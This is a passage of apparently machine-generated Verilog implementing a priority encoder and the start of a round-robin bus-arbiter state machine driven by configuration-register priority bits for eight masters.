            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[3] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[3]) ) 
        begin
            s0_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[3] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[3]) ) 
        begin
            s0_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[4] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[4]) ) 
        begin
            s0_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[4] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[4]) ) 
        begin
            s0_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[5] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[5]) ) 
        begin
            s0_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[5] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[5]) ) 
        begin
            s0_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[6] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[6]) ) 
        begin
            s0_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[6] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[6]) ) 
        begin
            s0_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[7] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[7]) ) 
        begin
            s0_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'h1 ) 
                begin
                    s0_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'h2 ) 
                    begin
                        s0_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s0_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s0_msel_pri_enc_valid[7] or  { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) })
    begin
        if (  !( s0_msel_pri_enc_valid[7]) ) 
        begin
            s0_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'h0 ) 
            begin
                s0_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s0_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s0_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd0_pri_out_d0 ) : ( s0_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s0_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd1_pri_out_d0 ) : ( s0_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd2_pri_out_d0 ) : ( s0_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd3_pri_out_d0 ) : ( s0_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd4_pri_out_d0 ) : ( s0_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd5_pri_out_d0 ) : ( s0_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd6_pri_out_d0 ) : ( s0_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd7_pri_out_d0 ) : ( s0_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd0_pri_out_d0 ) : ( s0_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s0_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd1_pri_out_d0 ) : ( s0_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd2_pri_out_d0 ) : ( s0_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd3_pri_out_d0 ) : ( s0_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd4_pri_out_d0 ) : ( s0_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd5_pri_out_d0 ) : ( s0_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd6_pri_out_d0 ) : ( s0_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd7_pri_out_d0 ) : ( s0_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s0_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s0_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s0_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s0_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s0_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s0_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s0_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd0_pri_out_d0 ) : ( s0_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s0_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd1_pri_out_d0 ) : ( s0_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd2_pri_out_d0 ) : ( s0_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd3_pri_out_d0 ) : ( s0_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd4_pri_out_d0 ) : ( s0_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd5_pri_out_d0 ) : ( s0_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd6_pri_out_d0 ) : ( s0_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s0_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s0_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s0_msel_pri_enc_pd7_pri_out_d0 ) : ( s0_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s0_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s0_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s0_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s0_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s0_next ) 
            begin
                s0_msel_pri_out <= ( ( ( s0_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s0_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s0_msel_pri_enc_pri_out0 ) : ( s0_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s0_msel_arb0_req = { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd0 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd0 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd0 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd0 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd0 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd0 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd0 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd0 ) ) };
    assign s0_msel_arb0_gnt = s0_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s0_msel_arb0_state <= s0_msel_arb0_grant0;
        end
        else
        begin 
            s0_msel_arb0_state <= s0_msel_arb0_next_state;
        end
    end
    always @ (  s0_msel_arb0_state or  { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd0 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd0 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd0 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd0 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd0 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd0 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd0 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s0_msel_arb0_next_state = s0_msel_arb0_state;
        case ( s0_msel_arb0_state ) 
        s0_msel_arb0_grant0:
        begin
            if (  !( s0_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[1] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[2] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[3] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[4] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[5] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[6] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[7] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant1:
        begin
            if (  !( s0_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[2] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[3] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[4] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[5] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s0_msel_arb0_req[6] ) 
                                begin
                                    s0_msel_arb0_next_state = s0_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb0_req[7] ) 
                                    begin
                                        s0_msel_arb0_next_state = s0_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb0_req[0] ) 
                                        begin
                                            s0_msel_arb0_next_state = s0_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb0_grant2:
        begin
            if (  !( s0_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s0_msel_arb0_req[3] ) 
                begin
                    s0_msel_arb0_next_state = s0_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s0_msel_arb0_req[4] ) 
                    begin
                        s0_msel_arb0_next_state = s0_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s0_msel_arb0_req[5] ) 
                        begin
                            s0_msel_arb0_next_state = s0_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s0_msel_arb0_req[6] ) 
                            begin
                                s0_msel_arb0_next_state = s0_msel_arb0_grant6;
